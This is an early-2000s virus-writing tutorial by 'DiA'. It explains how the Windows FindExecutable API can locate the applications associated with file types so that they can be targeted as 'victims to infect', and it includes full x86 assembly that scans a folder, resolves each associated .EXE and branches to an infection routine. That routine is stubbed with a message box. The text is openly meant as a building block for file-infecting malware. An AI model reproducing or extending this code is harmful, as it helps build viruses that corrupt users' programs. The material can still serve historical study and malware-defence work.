Find Victims with FindExecutable API    [by DiA]

  

                              Find Victims with FindExecutable API
                                          by DiA (c)04
                           www.vx-dia.de.vu - DiA_hates_machine@gmx.de
                           ___________________________________________


 ___________________________________________
| 1. Intro                                  |
| 2. API Info (from Win32 SDK Reference)    |
| 3. Example Code                           |
| 4. The Results?                           |
| 5. Outro                                  |
|___________________________________________|



1. Intro

With FindExecutable you can get a full path of a application that manages a file type!
As Examples:
.TXT -> linked with Notepad.EXE
.MP3 -> linked with WinAmp.EXE
.DOC -> linked with Word.EXE
...

Now find with FindExecutable API the linked application, and you have new victims to infect.
Don't know how to explain, see the API Info and the Example Code for better understanding.



2. API Info (from Win32 SDK Reference)

The FindExecutable function retrieves the name and handle to the executable (.EXE) file
associated with the specified filename.

HINSTANCE FindExecutable(

    LPCTSTR lpFile,	// pointer to string for filename
    LPCTSTR lpDirectory,// pointer to string for default directory
    LPTSTR lpResult 	// pointer to buffer for string for executable file on return
   );

Parameters


lpFile

Pointer to a null-terminated string specifying a filename. This can be a document or
executable file.


lpDirectory

Pointer to a null-terminated string specifying the default directory.


lpResult

Pointer to a buffer to receive the filename when the function returns. This filename is
a null-terminated string specifying the executable file started when an "open" association
is run on the file specified in the lpFile parameter.


Return Values

If the function succeeds, the return value is greater than 32.

If the function fails, the return value is less than or equal to 32. The following table
lists the possible error values:

Value                           Meaning
0	                        The system is out of memory or resources.
31	                        There is no association for the specified file type.
ERROR_FILE_NOT_FOUND	        The specified file was not found.
ERROR_PATH_NOT_FOUND	        The specified path was not found.
ERROR_BAD_FORMAT	        The .EXE file is invalid (non-Win32 .EXE or error in .EXE
                                image).


Remarks

When FindExecutable returns, the lpResult parameter may contain the path to the DDE
server started if no server responds to a request to initiate a DDE conversation.



3. Example Code

;-----FindExecutable.asm-----cut------------------------------------------------------------
.386
.model flat
jumps

extrn MessageBoxA	:PROC
extrn FindExecutableA	:PROC				;to get the linked application
extrn FindFirstFileA	:PROC				;search for *.* -> all files
extrn FindNextFileA	:PROC
extrn ExitProcess	:PROC

.data

FILETIME		STRUC
FT_dwLowDateTime	dd ?
FT_dwHighDateTime	dd ?
FILETIME		ENDS

WIN32_FIND_DATA          label    byte
 WFD_dwFileAttributes    dd       ?
 WFD_ftCreationTime      FILETIME ?
 WFD_ftLastAccessTime    FILETIME ?
 WFD_ftLastWriteTime     FILETIME ?
 WFD_nFileSizeHigh       dd       ?
 WFD_nFileSizeLow        dd       ?
 WFD_dwReserved0         dd       ?
 WFD_dwReserved1         dd       ?
 WFD_szFileName          db       260d dup (?)
 WFD_szAlternateFileName db       13   dup (?)
 WFD_szAlternateEnding   db       03   dup (?)

TargetFile		db 260 dup (?)			;save here the full path of victim

FileMask	db '*.*',0				;all files
FindHandle	dd 0					;save the find handle

.code
start:

push offset WIN32_FIND_DATA
push offset FileMask
call FindFirstFileA					;find first file in current folder
mov dword ptr [FindHandle],eax				;save find handle

FindNext:
test eax,eax						;no more filez, exit
jz Ende

push offset TargetFile					;save here full path of victim
push 0							;current directory
push offset WFD_szFileName				;file to get linked application
call FindExecutableA

cmp eax, 32d						;if <32 there is any error
jb FindNextPhile					;find next file

mov esi,offset TargetFile
call GetPoint						;get point to check extension
inc esi

cmp byte ptr [esi],'E'					;check if linked application
jne CheckAgain						;is a exe
inc esi							;maybe it's linked to .BAT or .PIF
cmp byte ptr [esi],'X'
jne CheckAgain
inc esi
cmp byte ptr [esi],'E'
je InfectFile						;if .EXE infect it

CheckAgain:
mov esi,offset TargetFile
call GetPoint
inc esi

cmp byte ptr [esi],'e'					;check for .exe
jne FindNextPhile
inc esi
cmp byte ptr [esi],'x'
jne FindNextPhile
inc esi
cmp byte ptr [esi],'e'
jne FindNextPhile					;if no .exe find next file

InfectFile:
push 0							;here the infection routine
push offset WFD_szFileName				;but only a MessageBox to show
push offset TargetFile					;that it works
push 0							;full path of linked application
call MessageBoxA					;is now in "TargetFile"

FindNextPhile:						;find next file
push offset WIN32_FIND_DATA
push dword ptr [FindHandle]				;via find handle
call FindNextFileA
jmp FindNext						;do it again

Ende:
push 0
call ExitProcess					;exit


GetPoint:						;i love this procedure ;)
cmp byte ptr [esi],'.'					;scan string for "."
jz PointFound
inc esi
jmp GetPoint
PointFound:
ret							;return

end start						;the end...
;-----FindExecutable.asm-----cut------------------------------------------------------------


4. The Results?

If it works how we want it, a new Victim is as string in "TargetFile". Like
"C:\Windows\Notepad.exe" (without the "). But when you search with "*.*" you find also
folders! But not a big problem, because folders are linked with "C:\Windows\Explorer.exe".
If you don't want to infect it again and again only check "TargetFile" for "Explorer.exe".

Another good thing, if "*.*" founds a .EXE it returns the same string.
Example:
WFD_szFileName = C:\Tests\FindExecutableTest.exe
TargetFile     = C:\Tests\FindExecutableTest.exe



5. Outro

That's all about the API FindExecutable! Have fun with this and thx for reading! For any
comment's please do a entry in my guestbook (www.vx-dia.de.vu), or mail me to:

                                                                 DiA_hates_machine@gmx.de



                                                                  _________________
                                                                  DiA (c)04 GermanY